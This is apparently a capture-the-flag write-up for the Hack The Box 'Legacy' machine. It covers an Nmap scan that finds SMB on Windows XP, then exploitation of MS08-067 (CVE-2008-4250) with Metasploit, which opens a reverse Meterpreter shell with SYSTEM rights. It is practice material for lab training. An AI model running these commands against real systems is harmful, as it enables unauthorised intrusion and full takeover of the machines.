##Enumeration##
Start off with our handy-dandy Nmap scan:
###Nmap###
nmap -T4 -A -v 10.10.10.4
Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-17 16:15 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:15
Completed NSE at 16:15, 0.00s elapsed
Initiating NSE at 16:15
Completed NSE at 16:15, 0.00s elapsed
Initiating Ping Scan at 16:15
Scanning 10.10.10.4 [4 ports]
Completed Ping Scan at 16:15, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:15
Completed Parallel DNS resolution of 1 host. at 16:15, 0.02s elapsed
Initiating SYN Stealth Scan at 16:15
Scanning 10.10.10.4 [1000 ports]
Discovered open port 139/tcp on 10.10.10.4
Discovered open port 445/tcp on 10.10.10.4
Completed SYN Stealth Scan at 16:15, 9.39s elapsed (1000 total ports)
Initiating Service scan at 16:15
Scanning 2 services on 10.10.10.4
Completed Service scan at 16:15, 6.46s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.4
Retrying OS detection (try #2) against 10.10.10.4
Initiating Traceroute at 16:15
Completed Traceroute at 16:15, 0.13s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 16:15
Completed Parallel DNS resolution of 2 hosts. at 16:15, 0.02s elapsed
NSE: Script scanning 10.10.10.4.
Initiating NSE at 16:15
Completed NSE at 16:20, 251.11s elapsed
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Nmap scan report for 10.10.10.4
Host is up (0.12s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized|media device
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (91%), General Dynamics embedded (85%), Cisco embedded (85%), Motorola embedded (85%)
OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_server_2003 cpe:/h:cisco:isb7150 cpe:/o:microsoft:windows_ce:5.0 cpe:/h:motorola:vip1200
Aggressive OS guesses: Microsoft Windows 2000 Server (91%), Microsoft Windows XP SP2 (91%), Microsoft Windows XP SP2 or Windows Small Business Server 2003 (91%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (91%), Microsoft Windows 2000 SP2 (89%), Microsoft Windows Server 2003 (89%), Microsoft Windows XP SP3 (89%), Microsoft Windows 2000 SP4 (89%), Microsoft Windows XP Professional SP3 (89%), Microsoft Windows XP SP2 or SP3 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: -3h00m02s, deviation: 0s, median: -3h00m02s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:aa:30:6d (VMware)
| Names:
| LEGACY<00> Flags: <unique><active>
| HTB<00> Flags: <group><active>
| LEGACY<20> Flags: <unique><active>
| HTB<1e> Flags: <group><active>
| HTB<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2017-09-17T20:15:47+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 123.57 ms 10.10.14.1
2 122.34 ms 10.10.10.4
NSE: Script Post-scanning.
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 275.83 seconds
Raw packets sent: 2101 (97.178KB) | Rcvd: 64 (3.774KB)
There isn’t too much going on here. SMB/NetBIOS and Microsoft-DS. Looks like the system is running Windows XP so this should be a walk in the park.
##Exploitation##
A quick search gets us CVE-2008-4250, which has a Metasploit module. How convenient! Let’s try it.
exploit/windows/smb/ms08_067_netapi
Note target 7 is Windows XP SP3 English (for me) although this may differ based on Metasploit version. Do show targets to list all available.
msf exploit(usermap_script) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf exploit(ms08_067_netapi) > set target 7
target => 7
msf exploit(ms08_067_netapi) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (171583 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.4:1035) at 2017-09-17 16:24:57 -0400
[+] negotiating tlv encryption
meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We’re in! Grab the flags from C:\Documents and Settings\john\Desktop\user.txt and C:\Documents and Settings\Administrator\Desktop\root.txt and call it a day.
